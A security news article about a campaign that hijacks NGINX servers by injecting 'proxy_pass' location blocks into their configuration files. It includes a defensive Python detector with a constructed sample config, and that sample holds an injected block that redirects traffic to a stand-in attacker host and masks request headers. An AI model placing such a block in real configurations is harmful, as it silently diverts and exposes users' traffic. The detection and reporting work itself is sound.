
Cybercriminals hijack NGINX servers to manipulate user traffic

Hackers Compromise NGINX Servers to Redirect User Traffic

An ongoing malicious campaign has been discovered that targets NGINX servers, compromising them to reroute user traffic through the attacker’s infrastructure. The threat actor uses a sophisticated method to hijack user connections and redirect them to attacker-controlled domains.

NGINX, open-source software widely used for managing web traffic, sits between users and servers. It handles web serving, load balancing, caching, and reverse proxying, making it a valuable tool for websites and online services.

Researchers at Datadog Security Labs uncovered this malicious campaign, which specifically targets NGINX installations and Baota hosting management panels. The campaign focuses on websites with Asian top-level domains (.in, .id, .pe, .bd, and .th) and on government and educational sites (.edu and .gov).


Image Source: Wiz

The attackers manipulate existing NGINX configuration files by injecting malicious ‘location’ blocks that capture incoming requests on specific URL paths. They then modify these requests to include the original URL and redirect the traffic to their own domains using the ‘proxy_pass’ directive.

While the ‘proxy_pass’ directive is typically used for load balancing to improve server performance, its misuse in this context raises no security alerts, allowing the attackers to operate undetected. The attackers also preserve request headers such as ‘Host,’ ‘X-Real-IP,’ ‘User-Agent,’ and ‘Referer’ so that the proxied traffic looks like the original request.
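A defender-side check for the injection pattern described above, added here as an example (it is not code from the article or from Datadog's research): it parses an NGINX configuration, collects every ‘location’ block, and flags those whose ‘proxy_pass’ points at a host outside a hypothetical allowlist of expected upstreams, recording which of the four preserved headers accompany the redirect. The sample configuration, the allowlist, and the attacker hostname are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed sample config (not from the article): one legitimate local proxy, one injected block.
SAMPLE_CONF = """server {
    location /api/ {
        proxy_pass http://127.0.0.1:8080;
    }
    location /news/ {
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
        proxy_pass http://attacker-controlled.example/$request_uri;
    }
}
"""
TRUSTED_UPSTREAMS = {"127.0.0.1", "localhost", "backend"}  # hypothetical allowlist
MASKING_HEADERS = {"host", "x-real-ip", "user-agent", "referer"}

def parse_locations(conf):
    # Brace-depth scan (one directive per line); nested blocks such as `if` are attributed to the enclosing location.
    blocks, stack = [], []
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"location\s+(?:[=~*^]+\s+)?(\S+)\s*\{$", line)
        if m:
            stack.append((m.group(1), []))
        elif line.endswith("{"):
            stack.append(None)
        elif line == "}" and stack and (top := stack.pop()):
            blocks.append(top)
        elif line.endswith(";"):
            loc = next((b for b in reversed(stack) if b), None)
            if loc:
                loc[1].append(line.rstrip(";").split())
    return blocks

def find_hijacked_locations(conf, trusted=TRUSTED_UPSTREAMS):
    # Flag a location whose proxy_pass leaves the allowlist and note which header-preserving directives travel with it.
    findings = []
    for path, directives in parse_locations(conf):
        target = next((urlparse(d[1]).hostname for d in directives
                       if d[0] == "proxy_pass" and len(d) > 1), None)
        headers = {d[1].lower() for d in directives
                   if d[0] == "proxy_set_header" and len(d) > 1}
        if target and target not in trusted:
            findings.append((path, target, sorted(headers & MASKING_HEADERS)))
    return findings
```

Running `find_hijacked_locations` over the real configuration directories (and over the Baota panel's generated vhost files) and diffing the result against a known-good baseline turns the silent ‘proxy_pass’ redirect into an alertable event.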

The attack employs a multi-stage toolkit to execute the NGINX configuration injections effectively. The toolkit progresses through five stages, each with a specific function aimed at compromising NGINX configurations and redirecting user traffic through attacker-controlled servers.

  • Stage 1 – zx.sh: Initial controller script responsible for downloading and executing subsequent stages.
  • Stage 2 – bt.sh: Targets NGINX configuration files managed by the Baota panel.
  • Stage 3 – 4zdh.sh: Enumerates common NGINX configuration locations and prevents configuration corruption.
  • Stage 4 – zdh.sh: Focuses on specific domain targets within NGINX configurations.
  • Stage 5 – ok.sh: Scans compromised configurations and exfiltrates data to a command-and-control server.
Overview of the hijacking attack (Source: Datadog)

These attacks are challenging to detect because they do not exploit vulnerabilities in NGINX but instead embed malicious instructions within its configuration files. Because user traffic still reaches its intended destination, the rerouting is difficult to notice without specific monitoring in place.
